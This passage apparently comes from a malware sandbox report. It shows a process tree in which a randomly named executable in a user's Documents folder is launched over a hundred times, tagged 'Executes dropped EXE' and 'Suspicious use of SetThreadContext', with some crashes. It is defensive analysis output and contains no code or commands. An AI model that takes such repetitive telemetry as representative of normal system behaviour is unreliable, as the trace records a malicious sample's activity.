  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3736
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    - Executes dropped EXE
    PID:4976
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    - Executes dropped EXE
    PID:2092
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    - Executes dropped EXE
    PID:5100
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:2344
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    - Executes dropped EXE
    PID:3792
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 24
      4⤵
      Program crash
      PID:5832
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5788
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4484
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5712
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6132
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4532
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5956
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5200
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6504
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6900
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5316
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6896
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 160
      4⤵
      Program crash
      PID:6584
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6984
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7236
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7708
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7308
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4292
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:2652
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8072
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7580
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8320
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8908
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8380
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9104
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8812
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8536
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5772
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8548
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8872
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9676
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10048
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9472
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9980
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9360
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9132
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:3564
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9908
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10528
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10872
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6780
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10724
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9280
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10004
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:2888
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:3336
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4292
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11352
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12048
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11284
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11748
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12004
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11840
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11652
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4612
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7400
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12428
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12952
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13000
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13288
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10132
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:8892
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13680
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13840
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14080
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13208
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13976
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5880
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13372
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5684
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:3556
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13392
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:10344
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14516
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15040
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9312
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12928
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15352
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14772
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15576
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15852
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16140
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15256
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:12684
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16284
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15552
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15716
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14168
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14716
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15892
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14724
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14456
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9248
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16028
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6844
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15180
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16880
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17176
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15440
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16604
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16148
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16960
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17300
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15176
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17116
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:580
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5404
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:4880
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17440
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17788
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17908
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18016
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18284
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17608
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17876
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17984
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17756
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17436
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13024
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7780
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:18144
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:1140
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:13836
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9240
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:6168
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:7960
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:9972
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14820
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:14152
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:11360
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:15248
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17732
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:17424
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:5360
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16364
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
    3⤵
    PID:16736
- - C:\Users\Admin\Documents\XrUXKDXoEhQzOQ9R4wGK2LY9.exe
